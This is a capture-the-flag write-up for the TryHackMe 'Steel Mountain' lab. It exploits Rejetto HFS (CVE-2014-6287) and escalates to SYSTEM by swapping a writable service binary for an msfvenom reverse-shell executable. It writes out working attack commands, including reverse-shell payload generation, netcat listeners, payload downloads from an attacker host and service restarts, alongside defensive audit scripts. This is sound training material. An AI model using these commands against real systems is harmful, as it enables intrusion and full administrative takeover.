TryHackMe-Steel Mountain

This is a Mr. Robot themed Windows machine. We use Metasploit for initial access, use PowerShell for Windows privilege escalation enumeration, and learn a new technique to get Administrator access. For exploitation, I will cover both the manual way and the Metasploit way.

We begin with an Nmap scan.

You will find the employee's name if you go to the webpage running on port 80, right-click, and choose Inspect Element.

Moving on, there is a Rejetto HTTP File Server running on port 8080.

A quick Google search immediately gives us an exploit (CVE-2014-6287) for this web server. Run Metasploit and let's roll...

use 0
show options
set RHOSTS <target ip>
set RPORT 8080
run

And we have a Meterpreter shell. The user flag can be found in C:\Users\bill\Desktop. At the end of this writeup I will also cover how to run this exploit manually (without Metasploit), but let's continue with our next step and escalate privileges to become Administrator.

Now this is the part of the CTF that requires a bit of understanding, so I'll break it down as simply as possible. This explanation will make things easier, so read it carefully.

First we will get a privilege escalation enumeration script called PowerUp onto the target machine and run its Invoke-AllChecks command, which finds all services and any privilege escalation vectors. You can also use winPEAS.

Then we will find a Windows service called AdvancedSystemCareService9 which runs with Administrator privileges, and whose binary path we can also change!!! This gives us the opportunity to place our malicious binary in the path of AdvancedSystemCareService9.

So what will our malicious binary do? It will connect back to our netcat listener and give us an Administrator shell (NT Authority).

LET'S BEGIN...

To enumerate this machine we will use a PowerShell script called PowerUp, whose purpose is to evaluate a Windows machine and determine any abnormalities: "PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations."

You can download the script here. Now you can use the upload command in Meterpreter to upload the script.

To execute it from Meterpreter, I type load powershell into Meterpreter, then enter a PowerShell session with powershell_shell.

Looking at the output, there is one particular service where the CanRestart option is set to True:

With this value set to True, we are able to restart this service on the system. The directory holding the application is also writable. This means we can replace the legitimate application with a malicious one, and once the service is restarted, our malicious program will run.

msfvenom can be used to generate a reverse shell as a Windows executable:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.22.145 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe

This can then be uploaded to the target machine via the Meterpreter shell (exit the PowerShell session first with CTRL+C):

upload ASCService.exe

Dropping back into a Windows shell, we can stop the legitimate service and then replace the application file with the malicious binary:

sc stop AdvancedSystemCareService9
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

Before restarting the service, we need to set up a listener within our local terminal:

nc -nlvp 4443

The service can then be restarted from the Windows shell:

sc start AdvancedSystemCareService9

Once the service restarts, you will get a reverse connection on your netcat listener. From here we can switch to the Administrator's Desktop directory and grab the root.txt file:

NOTE: You might see an error on your shell such as this, which is normal.

The reason we get this error is that AdvancedSystemCareService9 expects its legitimate executable, and we are running our malicious binary in its place instead.
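As the defender's counterpart to the swap above, here is an added example (not code from this writeup) that flags service binaries whose Authenticode signature is missing or broken and pulls the Service Control Manager stop/start events that the restart leaves in the System log; the display-name fragment 'SystemCare' used for the event filter is an assumption.

```powershell
# Added detection example, not part of the original writeup. A replaced
# ASCService.exe no longer carries the vendor's Authenticode signature, and
# the stop/start needed to run it logs Service Control Manager event 7036.
function Get-UnsignedServiceBinaries {
    Get-CimInstance Win32_Service | ForEach-Object {
        if (-not $_.PathName) { return }
        # Strip arguments from PathName: quoted path, else up to the first ".exe".
        if ($_.PathName -match '^"([^"]+)"|^(.+?\.exe)') {
            $bin = if ($Matches[1]) { $Matches[1] } else { $Matches[2] }
        } else { $bin = $_.PathName }
        if (-not (Test-Path -LiteralPath $bin)) { return }
        $sig = Get-AuthenticodeSignature -LiteralPath $bin
        [PSCustomObject]@{
            Service  = $_.Name
            RunsAs   = $_.StartName                  # LocalSystem = SYSTEM rights
            Binary   = $bin
            Status   = $sig.Status                   # Valid, NotSigned, HashMismatch, ...
            Signer   = $sig.SignerCertificate.Subject
            Modified = (Get-Item -LiteralPath $bin).LastWriteTime
        }
    } | Where-Object { $_.Status -ne 'Valid' }
}

function Get-RecentServiceStateChanges([string]$NameFragment, [int]$Hours = 24) {
    # Event 7036: "The <display name> service entered the <running|stopped> state."
    # The message uses the display name, so match on a fragment of it.
    Get-WinEvent -FilterHashtable @{
        LogName      = 'System'
        ProviderName = 'Service Control Manager'
        Id           = 7036
        StartTime    = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -like "*$NameFragment*" } |
        Select-Object TimeCreated, Message
}

# Unsigned or tampered service binaries, with who they run as and when changed.
Get-UnsignedServiceBinaries | Format-Table -AutoSize
# Assumed display-name fragment; adjust to the service you are watching.
Get-RecentServiceStateChanges -NameFragment 'SystemCare' | Format-Table -AutoSize
```

A legitimate service binary that shows NotSigned with a LastWriteTime minutes before a 7036 stop/start pair is exactly the trace the technique above leaves behind.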

Now for the manual way. Download the exploit script from https://www.exploit-db.com/exploits/39161

Change the IP to your IP (the TryHackMe attacker machine's tun0 address) and the port to some other port, for example 4545. Now give the script a read and you will find that we need to host nc.exe on our local web server on port 80.

You can get the nc.exe binary from GitHub, or simply search for it on your machine from the terminal.

Once I have found nc.exe, I copy it to /var/www/html and start the apache2 server, which runs on port 80 (as our exploit requires). INSTEAD OF DOING ALL THIS, WE CAN ALSO SIMPLY START A PYTHON WEB SERVER ON PORT 80 using the command: python -m SimpleHTTPServer 80

Now make sure to keep a netcat listener ready on port 4545 (take a look at my exploit; 4545 is the LPORT).

So I finally run our exploit, which I saved as "steel.py". Here 10.10.200.57 is my target IP and 8080 is the target port (the port on which the Rejetto web server is running). The usage is also mentioned in the exploit code; read it carefully.

And voilà, we have a shell on our netcat listener. To view the user flag, head over to C:\Users\bill\Desktop and use the type command to read it.

Now we will upload winPEAS, a popular script for finding possible privilege escalation vectors on Windows. To upload any file to the target machine you can use certutil, which is very popular, or Invoke-WebRequest.

Get winPEAS

powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://<attacker ip>/winPEAS.exe"

Verify the file is downloaded

dir

Run winPEAS.exe

winPEAS.exe

Note the unquoted path in the winPEAS output:

AdvancedSystemCareService9    C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

For manually listing services we use the command:

powershell -c "Get-Service"

ANSWER: powershell -c "Get-Service"
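The conditions PowerUp reported earlier (a service that runs as SYSTEM, can be restarted, and lives in a writable directory) and the unquoted path winPEAS flags above can be audited with a short script of your own; this is an added example, not code from the writeup, PowerUp or winPEAS, and the list of low-privileged principals it checks is an assumption you should extend for your environment.

```powershell
# Added audit script, not from the original writeup or from PowerUp/winPEAS:
# report services whose binary path is unquoted and contains spaces, or whose
# binary or containing directory is writable by low-privileged principals.
# Run as an administrator on the host being audited.

# Assumed set of principals that must never hold write access on a service
# binary; add your own low-privileged groups here.
$lowPriv = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
$writeRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-ServiceBinaryPath([string]$PathName) {
    # Strip arguments: a quoted path ends at the closing quote, otherwise take
    # everything up to and including the first ".exe".
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName
}

function Test-LowPrivWritable([string]$Path) {
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeRights) -ne 0) { return $true }
    }
    return $false
}

function Get-RiskyServices {
    Get-CimInstance Win32_Service | ForEach-Object {
        if (-not $_.PathName) { return }
        $bin = Get-ServiceBinaryPath $_.PathName
        [PSCustomObject]@{
            Name        = $_.Name
            RunsAs      = $_.StartName            # LocalSystem = full SYSTEM rights
            Binary      = $bin
            Unquoted    = ($_.PathName -notmatch '^"') -and ($bin -match ' ')
            DirWritable = Test-LowPrivWritable (Split-Path -Parent $bin)
            BinWritable = Test-LowPrivWritable $bin
        }
    } | Where-Object { $_.Unquoted -or $_.DirWritable -or $_.BinWritable }
}

# On Steel Mountain this should list AdvancedSystemCareService9 with Unquoted
# and DirWritable both True; the fix is to quote the path and tighten the ACL.
Get-RiskyServices | Format-Table -AutoSize
```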

Go to the path

cd \Program Files (x86)\IObit\Advanced SystemCare

Back to attacker’s machine, create msfvenom payload

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1234 -f exe -o ASCService.exe

Create listener on port 1234

nc -lvp 1234

Back to victim’s machine, stop service

sc stop AdvancedSystemCareService9

Backup ASCService.exe

rename ASCService.exe ASCService_bak.exe

Download our payload

powershell -c "Invoke-WebRequest -OutFile ASCService.exe http://10.8.3.50/ASCService.exe"

Start the service

sc start AdvancedSystemCareService9

Go back to your netcat listener on port 1234 and run the whoami command to confirm you are Administrator (NT Authority).

For the manual exploitation part, you can also take a look at this writeup by Zach Heller in case of any doubts (https://zacheller.dev/thm-steelmountain). I hope you learned something from this writeup.

-ZEUS

I am a penetration tester, currently pursuing OSCP. Skilled in network pentesting and developing hacking tools using Python. I share my knowledge on YouTube.